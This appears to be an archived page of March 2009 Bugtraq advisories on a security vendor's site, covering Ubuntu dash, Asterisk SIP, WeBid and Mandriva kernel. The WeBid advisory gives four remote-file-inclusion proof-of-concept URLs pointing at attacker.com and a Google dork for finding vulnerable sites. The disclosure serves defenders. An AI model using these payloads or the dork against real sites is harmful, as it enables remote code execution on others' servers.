English | Deutsch | Español
 
Startseite ▼
Startseite Über uns Kontact Datenschutz Partnerprogramme Zeugnisse In der Presse Mailinglisten Missbrauch Developer APIs
Bookkeeping
Online ▼
Home Free Trial FAQ
Open/Create Company File Accept an Invite Order/Renew
Sicherheits
Überprüfungs ▼
Home Dediziert Erweitert Standard Wiederkehrend Risikolos Desktop Basis Sicherheits Segal FAQ Preis/Funktionszusammenfassung Bestellen Neue Anfälligkeiten Alle Anfälligkeiten Vertraulichkeit Anfälligkeiten Suche Durchführen Terminkalender IP Permissions Maßgeschneidert Warteschlange Erinnerer Siegel Berichte Berichts Stil
Verwaltetes
DNS ▼
Info Bestellen/Erneuern FAQ AUP Dynamic DNS Clients
Domaine konfigurieren Dyanmic DNS Update Password
Netzwerk
Überwachung ▼
Enterprise Erweiterte Standard Gratis Test FAQ Preis/Funktionszusammenfassung Bestellen Beispiele
Konfigurieren/Status Alarm Profile
Recherce
Berichte ▼
Home FAQ Glossary Archive
 Anmeldung/Registrierung 
 
 Anfälligkeitssuche        Suche in 219043 CVE Beschreibungen
und 99761 Test Beschreibungen,
Zugriff auf 10,000+ Quellverweise.
Tests   CVE   Alle  

===========================================================
Ubuntu Security Notice USN-732-1             March 10, 2009
dash vulnerability
CVE-2009-0854
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  dash                            0.5.4-8ubuntu1.1

Ubuntu 8.10:
  dash                            0.5.4-9ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Wolfgang M. Reimer discovered that dash, when invoked as a login shell, would
source .profile files from the current directory. Local users may be able to
bypass security restrictions and gain root privileges by placing specially
crafted .profile files where they might get sourced by other dash users.


Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1.diff.gz
      Size/MD5:   171656 5f74e0a922546193a9e6279ad8680c76
    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1.dsc
      Size/MD5:      697 e78236937fea17c0c7a43427321b1ce6
    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4.orig.tar.gz
      Size/MD5:   212145 bc457e490a589d2f87f2333616b67931

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/d/dash/ash_0.5.4-8ubuntu1.1_all.deb
      Size/MD5:    22068 82557822348627c1b240069e431886e2

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_amd64.deb
      Size/MD5:    96918 b8d43124e5353042c7fd93fcc5c19cc9

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_i386.deb
      Size/MD5:    87952 6bc4578aea92450f8e00625fd7a7755a

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_lpia.deb
      Size/MD5:    88194 a90de1a5dedb9cbaeb65537e8e933356

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_powerpc.deb
      Size/MD5:    97400 5e2187820648d980b4edaa4e4a71b6c5

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_sparc.deb
      Size/MD5:    91072 dc5e22376445e185eacdaa049421c866

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1.diff.gz
      Size/MD5:   129759 b5363e9ff9550e89dec4be8ddc408607
    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1.dsc
      Size/MD5:     1083 dc87a11f64c53960ffb1f55dc42a253f
    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4.orig.tar.gz
      Size/MD5:   212145 bc457e490a589d2f87f2333616b67931

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/d/dash/ash_0.5.4-9ubuntu1.1_all.deb
      Size/MD5:    22286 9a34d34a67d46b8fa42584a2a7d61f76

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_amd64.deb
      Size/MD5:    99406 8703819fce4bc25f65caa350de05763c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_i386.deb
      Size/MD5:    90266 9d8931f5ef08f4d649127db0ab644f8e

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_lpia.deb
      Size/MD5:    90322 a0db897e7a7c5a7706d71674bad025ee

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_powerpc.deb
      Size/MD5:    99500 a583f4a7fc59a7495cb3615c4af54b05

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_sparc.deb
      Size/MD5:    93030 1bd3a8c0907e56cb2ed17c572e61842b



--=-UJW/IxyRJzuGmm9cjozh
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkm2m1gACgkQLMAs/0C4zNqpSgCeLpcCwv2HxQbBl47MmmbGyyJn
FHIAnAqxJRRcam0OyXgwgOY+WuUpfvld
=cZeU
-----END PGP SIGNATURE-----

--=-UJW/IxyRJzuGmm9cjozh--

From - Tue Mar 10 14:31:14 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000689e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39704-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3E500ED81C
for <lists@securityspace.com>; Tue, 10 Mar 2009 14:28:01 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 81F18237390; Tue, 10 Mar 2009 10:43:32 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20691 invoked from network); 10 Mar 2009 17:02:45 -0000
To: bugtraq@securityfocus.com
From: "Asterisk Security Team" <security@asterisk.org>
Subject: AST-2009-002: Remote Crash Vulnerability in SIP channel driver
Message-Id: <E1Lh5uX-00022G-2b@mail.digium.com>
Date: Tue, 10 Mar 2009 12:38:37 -0500
Status:   

               Asterisk Project Security Advisory - AST-2009-002

   +------------------------------------------------------------------------+
   |       Product       | Asterisk                                         |
   |---------------------+--------------------------------------------------|
   |       Summary       | Remote Crash Vulnerability in SIP channel driver |
   |---------------------+--------------------------------------------------|
   | Nature of Advisory  | Denial of Service                                |
   |---------------------+--------------------------------------------------|
   |   Susceptibility    | Remote Authenticated Sessions                    |
   |---------------------+--------------------------------------------------|
   |      Severity       | Moderate                                         |
   |---------------------+--------------------------------------------------|
   |   Exploits Known    | No                                               |
   |---------------------+--------------------------------------------------|
   |     Reported On     | February 6, 2009                                 |
   |---------------------+--------------------------------------------------|
   |     Reported By     | bugs.digium.com user klaus3000                   |
   |---------------------+--------------------------------------------------|
   |      Posted On      | March 10, 2009                                   |
   |---------------------+--------------------------------------------------|
   |   Last Updated On   | March 10, 2009                                   |
   |---------------------+--------------------------------------------------|
   |  Advisory Contact   | Joshua Colp <jcolp@digium.com>                   |
   |---------------------+--------------------------------------------------|
   |      CVE Name       |                                                  |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Description | When configured with pedantic=yes the SIP channel driver |
   |             | performs extra request URI checking on an INVITE         |
   |             | received as a result of a SIP spiral. As part of this    |
   |             | extra checking the headers from the outgoing SIP INVITE  |
   |             | sent and the received SIP INVITE are compared. The code  |
   |             | incorrectly assumes that the string for each header      |
   |             | passed in will be non-NULL in all cases. This is         |
   |             | incorrect because if no headers are present the value    |
   |             | passed in will be NULL.                                  |
   |             |                                                          |
   |             | The values passed into the code are now checked to be    |
   |             | non-NULL before being compared.                          |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Resolution | Upgrade to revision 174082 of the 1.4 branch, 174085 of   |
   |            | the 1.6.0 branch, 174086 of the 1.6.1 branch, or one of   |
   |            | the releases noted below.                                 |
   |            |                                                           |
   |            | The pedantic option in the SIP channel driver can also be |
   |            | turned off to prevent this issue from occurring.          |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                           Affected Versions                            |
   |------------------------------------------------------------------------|
   |          Product           | Release |                                 |
   |                            | Series  |                                 |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    |  1.2.x  | Not affected                    |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    |  1.4.x  | Versions 1.4.22, 1.4.23,        |
   |                            |         | 1.4.23.1                        |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    | 1.6.0.x | All versions prior to 1.6.0.6   |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    | 1.6.1.x | All versions prior to           |
   |                            |         | 1.6.1.0-rc2                     |
   |----------------------------+---------+---------------------------------|
   |      Asterisk Addons       |  1.2.x  | Not affected                    |
   |----------------------------+---------+---------------------------------|
   |      Asterisk Addons       |  1.4.x  | Not affected                    |
   |----------------------------+---------+---------------------------------|
   |      Asterisk Addons       |  1.6.x  | Not affected                    |
   |----------------------------+---------+---------------------------------|
   | Asterisk Business Edition  |  A.x.x  | Not affected                    |
   |----------------------------+---------+---------------------------------|
   | Asterisk Business Edition  |  B.x.x  | Not affected                    |
   |----------------------------+---------+---------------------------------|
   | Asterisk Business Edition  |  C.x.x  | Only version C.2.3              |
   |----------------------------+---------+---------------------------------|
   | s800i (Asterisk Appliance) |  1.2.x  | Not affected                    |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                              Corrected In                              |
   |------------------------------------------------------------------------|
   |                  Product                  |          Release           |
   |-------------------------------------------+----------------------------|
   |           Asterisk Open Source            |          1.4.23.2          |
   |-------------------------------------------+----------------------------|
   |           Asterisk Open Source            |          1.6.0.6           |
   |-------------------------------------------+----------------------------|
   |           Asterisk Open Source            |        1.6.1.0-rc2         |
   |-------------------------------------------+----------------------------|
   |         Asterisk Business Edition         |          C.2.3.2           |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                                Patches                                 |
   |------------------------------------------------------------------------|
   |                               URL                               |Branch|
   |-----------------------------------------------------------------+------|
   |http://downloads.digium.com/pub/security/AST-2009-002-1.4.diff   |1.4   |
   |-----------------------------------------------------------------+------|
   |http://downloads.digium.com/pub/security/AST-2009-002-1.6.0.diff |1.6.0 |
   |-----------------------------------------------------------------+------|
   |http://downloads.digium.com/pub/security/AST-2009-002-1.6.1.diff |1.6.1 |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |      Links       | http://bugs.digium.com/view.php?id417            |
   |                  |                                                     |
   |                  | http://bugs.digium.com/view.php?id547            |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Asterisk Project Security Advisories are posted at                     |
   | http://www.asterisk.org/security                                       |
   |                                                                        |
   | This document may be superseded by later versions; if so, the latest   |
   | version will be posted at                                              |
   | http://downloads.digium.com/pub/security/AST-2009-002.pdf and          |
   | http://downloads.digium.com/pub/security/AST-2009-002.html             |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                            Revision History                            |
   |------------------------------------------------------------------------|
   |       Date       |       Editor       |         Revisions Made         |
   |------------------+--------------------+--------------------------------|
   | 2009-03-10       | Joshua Colp        | Initial release                |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-002
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

From - Tue Mar 10 15:01:12 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068a0
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39705-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 4E680ED8B8
for <lists@securityspace.com>; Tue, 10 Mar 2009 14:59:00 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id ADBEE2370D1; Tue, 10 Mar 2009 11:54:23 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 23041 invoked from network); 10 Mar 2009 17:37:01 -0000
Date: Tue, 10 Mar 2009 12:10:49 -0600
Message-Id: <200903101810.n2AIAnHG006291@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln@e-rdc.org
To: bugtraq@securityfocus.com
Subject: [ECHO_ADV_104$2009] WeBid <= 0.7.3 RC9 Multiple Remote File
 Inclution Vulnerabilities
Status:   

ECHO_ADV_104$2009

-----------------------------------------------------------------------------------------
[ECHO_ADV_104$2009] WeBid <= 0.7.3 RC9 Multiple Remote File Inclution Vulnerabilities
-----------------------------------------------------------------------------------------

Author       : K-159
Date         : March, 11 th 2009
Location     : Jakarta, Indonesia
Web          : http://e-rdc.org/v1/news.php?readmore7
Critical Lvl : High
Impact       : System Access
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : WeBid
version     : <= 0.7.3 RC9
Vendor      : http://sourceforge.net/projects/simpleauction
              http://www.webidsupport.com/
Description :

WeBid is Open source php/mysql fully featured auction script. Perfect for those who want to start their own auction site.

--------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

Input passed to the "$include_path" parameter in cron.php page is not properly verified before being used 
to include files.This can be exploited to include arbitrary files from local or external resources.
This vulnerability also happen to files ST_browsers.php, ST_countries.php, ST_platforms.php in admin's folder
Successful exploitation requires that "register_globals" is enabled.


Poc/Exploit:
~~~~~~~~~
http://www.example.com/[path]/cron.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_brwosers.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_countries.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_platforms.php?include_path=http://www.attacker.com/evil?

Dork:
~~~~~
Google : "copyright 2008, WEBID"


Solution:
~~~~~~~

- Edit the source code to ensure that input is properly verified.
- turn off register_globals.

Timeline:
~~~~~~~~~

- 08 - 03 - 2009 bug found
- 08 - 03 - 2009 vendor contacted
- 08 - 03 - 2009 vendor response
- 11 - 03 - 2009 advisory release
---------------------------------------------------------------------------

Shoutz:
~~~~~
~ ping - my dearest wife, zizou - my beloved son, i-eyes - my beloved daughter.
~ y3dips,the_day,Negatif,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
the_hydra,neng chika, str0ke
~ scanners [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ SK,Abond,pokley,cybertank, super_temon,whatsoever,b120t0,inggar,fachri,adi,rahmat,indra
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b,cR4SH3R,ogeb,bagan,devsheed
~ dr188le,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,ghostblup,shamus,
kuntua, stev_manado,nofry,k1tk4t,0pt1c,k1ngk0ng
~ newbie_hacker@yahoogroups.com
~ milw0rm.com, macaholic.info, unitiga.com, mac.web.id, indowebster.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~

K-159 || echo|staff || adv[at]e-rdc[dot]org
Homepage: http://www.e-rdc.org/

-------------------------------- [ EOF ] ---------------------------------- 

From - Tue Mar 10 16:31:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068a2
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39706-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 734E0ED8B5
for <lists@securityspace.com>; Tue, 10 Mar 2009 16:30:34 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3C5DE236F65; Tue, 10 Mar 2009 13:25:08 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25960 invoked from network); 10 Mar 2009 18:29:23 -0000
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:071 ] kernel
Date: Tue, 10 Mar 2009 20:03:01 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1Lh7ED-0002rV-65@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:071
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : kernel
 Date    : March 10, 2009
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

 Some vulnerabilities were discovered and corrected in the Linux
 2.6 kernel:
 
 The skfp_ioctl function in drivers/net/skfp/skfddi.c in the Linux
 kernel before 2.6.28.6 permits SKFP_CLR_STATS requests only when the
 CAP_NET_ADMIN capability is absent, instead of when this capability
 is present, which allows local users to reset the driver statistics,
 related to an inverted logic issue. (CVE-2009-0675)
 
 The sock_getsockopt function in net/core/sock.c in the Linux kernel
 before 2.6.28.6 does not initialize a certain structure member, which
 allows local users to obtain potentially sensitive information from
 kernel memory via an SO_BSDCOMPAT getsockopt request. (CVE-2009-0676)
 
 Additionaly, this update provides stable 1.0.18 ALSA updates/fixes,
 STAC92HD71Bx/STAC92HD75Bx hda-intel support changes/fixes
 (affects sound chip codecs used on several HP dv laptop series),
 fixes/enhancements for HP Educ.ar machine HDA sound support, minor
 alsa hda-intel code cleanup for ALC888 6stack-dell model, to stop
 printing uneeded output to kernel log, and a few more things. Check
 the package changelog for details.
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0675
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0676
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 61afebcd3771e9e0ab1bad53e3f8373a  2009.0/i586/alsa_raoppcm-kernel-2.6.27.19-desktop-1mnb-0.5.1-2mdv2008.0.i586.rpm
 27d03985a836b7b94e72d7315c156987  2009.0/i586/alsa_raoppcm-kernel-2.6.27.19-desktop586-1mnb-0.5.1-2mdv2008.0.i586.rpm
 d9da9f1c32d118c6f639239337196cc9  2009.0/i586/alsa_raoppcm-kernel-2.6.27.19-server-1mnb-0.5.1-2mdv2008.0.i586.rpm
 65c1548d0c1fab5cf5c09c5b182ea3cb  2009.0/i586/alsa_raoppcm-kernel-desktop586-latest-0.5.1-1.20090305.2mdv2008.0.i586.rpm
 0cf0195037dd993090eebd533c628871  2009.0/i586/alsa_raoppcm-kernel-desktop-latest-0.5.1-1.20090305.2mdv2008.0.i586.rpm
 df49df642b44707f972076bdd5c947af  2009.0/i586/alsa_raoppcm-kernel-server-latest-0.5.1-1.20090305.2mdv2008.0.i586.rpm
 0a050010bd2813b68102f6ff883e2d2f  2009.0/i586/drm-experimental-kernel-2.6.27.19-desktop-1mnb-2.3.0-2.20080912.1mdv2009.0.i586.rpm
 46bfb873303de28e996129e42e7f4a85  2009.0/i586/drm-experimental-kernel-2.6.27.19-desktop586-1mnb-2.3.0-2.20080912.1mdv2009.0.i586.rpm
 e9a08199d657acc65e60f140717f72a8  2009.0/i586/drm-experimental-kernel-2.6.27.19-server-1mnb-2.3.0-2.20080912.1mdv2009.0.i586.rpm
 3108e8192dbc5f3bd8132fafcd550e46  2009.0/i586/drm-experimental-kernel-desktop586-latest-2.3.0-1.20090305.2.20080912.1mdv2009.0.i586.rpm
 c974b12ec1b9e17934910fa2fdc65875  2009.0/i586/drm-experimental-kernel-desktop-latest-2.3.0-1.20090305.2.20080912.1mdv2009.0.i586.rpm
 0dc0c43be39fa0cfc67999912be31e50  2009.0/i586/drm-experimental-kernel-server-latest-2.3.0-1.20090305.2.20080912.1mdv2009.0.i586.rpm
 6dba4fd0c629cfab5f0a4238e691c450  2009.0/i586/et131x-kernel-2.6.27.19-desktop-1mnb-1.2.3-7mdv2009.0.i586.rpm
 08f48bfe132d1d3bfd8c84bf60b21f94  2009.0/i586/et131x-kernel-2.6.27.19-desktop586-1mnb-1.2.3-7mdv2009.0.i586.rpm
 310225a864a0a24708e0aa8e1c5bc87d  2009.0/i586/et131x-kernel-2.6.27.19-server-1mnb-1.2.3-7mdv2009.0.i586.rpm
 d6028a9d3ccdd543868e1f8f2309375e  2009.0/i586/et131x-kernel-desktop586-latest-1.2.3-1.20090305.7mdv2009.0.i586.rpm
 470057078784c367ff2ee987c4efc3b4  2009.0/i586/et131x-kernel-desktop-latest-1.2.3-1.20090305.7mdv2009.0.i586.rpm
 9611daac352b2b5a5ce66de0a175b40e  2009.0/i586/et131x-kernel-server-latest-1.2.3-1.20090305.7mdv2009.0.i586.rpm
 1f4be7e785fe4bbd23cf52e549ad31d4  2009.0/i586/fcpci-kernel-2.6.27.19-desktop-1mnb-3.11.07-7mdv2009.0.i586.rpm
 9259df8eea95ab4c6be94ff94752352c  2009.0/i586/fcpci-kernel-2.6.27.19-desktop586-1mnb-3.11.07-7mdv2009.0.i586.rpm
 37f645421d0a3eef7a013061b6402bd4  2009.0/i586/fcpci-kernel-2.6.27.19-server-1mnb-3.11.07-7mdv2009.0.i586.rpm
 a9c38157f40eef9eecdededba8b93bc5  2009.0/i586/fcpci-kernel-desktop586-latest-3.11.07-1.20090305.7mdv2009.0.i586.rpm
 1259abf8542a729034e2a3caa24353c0  2009.0/i586/fcpci-kernel-desktop-latest-3.11.07-1.20090305.7mdv2009.0.i586.rpm
 fbdb64d37e35742adbc5719d41f9b2c1  2009.0/i586/fcpci-kernel-server-latest-3.11.07-1.20090305.7mdv2009.0.i586.rpm
 8925cf262ad2b33d13b0ef6cb5ec41b1  2009.0/i586/fglrx-kernel-2.6.27.19-desktop-1mnb-8.522-3mdv2009.0.i586.rpm
 73e0ec5851fcfb99d06be9f0d5203a06  2009.0/i586/fglrx-kernel-2.6.27.19-desktop586-1mnb-8.522-3mdv2009.0.i586.rpm
 eedcc5a0f371222ddc2eb5482d737bc8  2009.0/i586/fglrx-kernel-2.6.27.19-server-1mnb-8.522-3mdv2009.0.i586.rpm
 fd0464982249318d17b9f6cfd2451859  2009.0/i586/fglrx-kernel-desktop586-latest-8.522-1.20090305.3mdv2009.0.i586.rpm
 e3898f97fa6a5a148b6ac24a73bf47e6  2009.0/i586/fglrx-kernel-desktop-latest-8.522-1.20090305.3mdv2009.0.i586.rpm
 64d5ee23095c3617b7fa47c9fab43519  2009.0/i586/fglrx-kernel-server-latest-8.522-1.20090305.3mdv2009.0.i586.rpm
 5ee316c17206494b6f25c17035e9e53e  2009.0/i586/gnbd-kernel-2.6.27.19-desktop-1mnb-2.03.07-2mdv2009.0.i586.rpm
 d781b5704e4afffe08cd8a78bdde43a0  2009.0/i586/gnbd-kernel-2.6.27.19-desktop586-1mnb-2.03.07-2mdv2009.0.i586.rpm
 20f877e569d893f0f6808ac5f023fc3b  2009.0/i586/gnbd-kernel-2.6.27.19-server-1mnb-2.03.07-2mdv2009.0.i586.rpm
 79f3ba9a48b1d2436269b963f9d7199e  2009.0/i586/gnbd-kernel-desktop586-latest-2.03.07-1.20090305.2mdv2009.0.i586.rpm
 c6e0d5becd4f7cc0302b258a5269839c  2009.0/i586/gnbd-kernel-desktop-latest-2.03.07-1.20090305.2mdv2009.0.i586.rpm
 b389ed157d1692fda551b2b125543f7c  2009.0/i586/gnbd-kernel-server-latest-2.03.07-1.20090305.2mdv2009.0.i586.rpm
 d992626da9eba81fed080093841ba50e  2009.0/i586/hcfpcimodem-kernel-2.6.27.19-desktop-1mnb-1.17-1.2mdv2009.0.i586.rpm
 66eb8aee73d3f1aac15fb46cdce1eaf9  2009.0/i586/hcfpcimodem-kernel-2.6.27.19-desktop586-1mnb-1.17-1.2mdv2009.0.i586.rpm
 b1afbdd9e1b048fa00e85a51e6b59e57  2009.0/i586/hcfpcimodem-kernel-2.6.27.19-server-1mnb-1.17-1.2mdv2009.0.i586.rpm
 e3cf741c353bd1e0fa8af1b8aca15f88  2009.0/i586/hcfpcimodem-kernel-desktop586-latest-1.17-1.20090305.1.2mdv2009.0.i586.rpm
 ebebf07db6ac43826de0ffee0f079d34  2009.0/i586/hcfpcimodem-kernel-desktop-latest-1.17-1.20090305.1.2mdv2009.0.i586.rpm
 d92da18ccf2855881f2ffb006d1df04e  2009.0/i586/hcfpcimodem-kernel-server-latest-1.17-1.20090305.1.2mdv2009.0.i586.rpm
 db7a83573cc2a4e81dbcda769cfd23c2  2009.0/i586/hsfmodem-kernel-2.6.27.19-desktop-1mnb-7.68.00.13-1.2mdv2009.0.i586.rpm
 23454d0f0418e0a0fcd9ad8add343400  2009.0/i586/hsfmodem-kernel-2.6.27.19-desktop586-1mnb-7.68.00.13-1.2mdv2009.0.i586.rpm
 f3ff6ad3908f5c57e9ccb0142eddfad6  2009.0/i586/hsfmodem-kernel-2.6.27.19-server-1mnb-7.68.00.13-1.2mdv2009.0.i586.rpm
 6d989426917fa819f193bd0020baea1d  2009.0/i586/hsfmodem-kernel-desktop586-latest-7.68.00.13-1.20090305.1.2mdv2009.0.i586.rpm
 b358ef6bce77e69efd87e63eb770ccf5  2009.0/i586/hsfmodem-kernel-desktop-latest-7.68.00.13-1.20090305.1.2mdv2009.0.i586.rpm
 1ea085063a1d26dca7ff5faa8e4ab060  2009.0/i586/hsfmodem-kernel-server-latest-7.68.00.13-1.20090305.1.2mdv2009.0.i586.rpm
 2ea3e6c680ac8020dfb0ee277c4b7597  2009.0/i586/hso-kernel-2.6.27.19-desktop-1mnb-1.2-2mdv2009.0.i586.rpm
 3c435d935202dc8e70aa0241c5d142a9  2009.0/i586/hso-kernel-2.6.27.19-desktop586-1mnb-1.2-2mdv2009.0.i586.rpm
 a0db9fa6fe6a174988de553e83b7bcfe  2009.0/i586/hso-kernel-2.6.27.19-server-1mnb-1.2-2mdv2009.0.i586.rpm
 f4fe9969486a3d43adaaf3c4b2c2a22e  2009.0/i586/hso-kernel-desktop586-latest-1.2-1.20090305.2mdv2009.0.i586.rpm
 8ded44f50a794f2fe0f11170a2ff62b7  2009.0/i586/hso-kernel-desktop-latest-1.2-1.20090305.2mdv2009.0.i586.rpm
 336abd9a2e72fb5d90814fe9ac5b01da  2009.0/i586/hso-kernel-server-latest-1.2-1.20090305.2mdv2009.0.i586.rpm
 a0a1685639462c8fb6eb575946c17644  2009.0/i586/iscsitarget-kernel-2.6.27.19-desktop-1mnb-0.4.16-4mdv2009.0.i586.rpm
 478eb2a9bdc27beb634d43c1b33d87b2  2009.0/i586/iscsitarget-kernel-2.6.27.19-desktop586-1mnb-0.4.16-4mdv2009.0.i586.rpm
 79736958877a505789cf8191c142c26a  2009.0/i586/iscsitarget-kernel-2.6.27.19-server-1mnb-0.4.16-4mdv2009.0.i586.rpm
